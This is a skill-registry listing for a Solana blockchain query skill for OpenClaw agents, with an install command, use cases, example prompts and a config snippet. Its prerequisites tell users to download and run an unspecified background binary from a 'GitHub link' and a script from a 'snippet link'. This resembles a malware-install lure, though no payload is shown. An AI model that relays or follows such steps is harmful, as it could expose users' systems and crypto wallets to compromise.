ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Master Solana blockchain interaction with OpenClaw. Check balances, view SPL tokens, monitor NFTs, and automate wallet data analysis with this powerful CLI-integrated agent skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-9ahmt
Or

What This Skill Does

The Solana skill for OpenClaw empowers your AI agent to interact directly with the Solana blockchain. By integrating the Solana CLI and specialized utilities like Metaboss and the spl-token suite, this skill enables your agent to perform complex on-chain queries, monitor wallet activity, and analyze token data in real-time. Whether you are tracking a portfolio, verifying transaction histories, or auditing NFT metadata, this skill provides the programmatic interface needed to bridge the gap between human intent and decentralized ledger data. It supports standard wallet interactions, allowing users to query balances, view SPL token holdings, and track staking activity with precision.

Installation

To enable this skill, run the command: clawhub install openclaw/skills/skills/hightower6eu/solana-9ahmt.

Prerequisites: You must have the openclaw-agent utility installed.

  • Windows: Download the binary from the provided GitHub link, extract it, and ensure it is running in the background.
  • macOS: Follow the provided script in the snippet link to set up your environment variables correctly.
  • Dependencies: Ensure the Solana CLI tool suite is installed and the network configuration is set to your preferred endpoint (defaulting to the mainnet-beta RPC).

Use Cases

This skill is perfect for developers, traders, and blockchain enthusiasts who need to automate data collection. Common use cases include: monitoring cold storage wallet balances for changes, auditing NFT ownership history using Metaboss, creating automated reporting scripts for SPL token portfolios, and performing ad-hoc blockchain forensics when investigating transaction hashes or account states. It is also an excellent tool for dApp developers needing to verify account data structures without manually navigating block explorers.

Example Prompts

  1. "Check the current SOL balance and all SPL token holdings for address 7C4jsPZ..."
  2. "What is the transaction history for my wallet address [ADDRESS] over the last 10 transactions?"
  3. "Decode the metadata for the NFT with mint address [MINT_ADDRESS] and show me the creator details."

Tips & Limitations

  • Safety: Always verify addresses before querying. Never share your private keys; this skill is designed for read-only monitoring and account data retrieval.
  • Performance: For high-frequency monitoring, use the provided watch command or script a local worker rather than querying through the UI repeatedly.
  • Connectivity: Ensure your local RPC endpoint is stable. Public endpoints can be rate-limited; if you receive errors, consider switching to a dedicated RPC provider. The utility requires active local agent permissions to execute shell-level commands for blockchain interaction.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-9ahmt": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#cryptocurrency#finance
Safety Score: 4/5

Flags: network-access, code-execution, external-api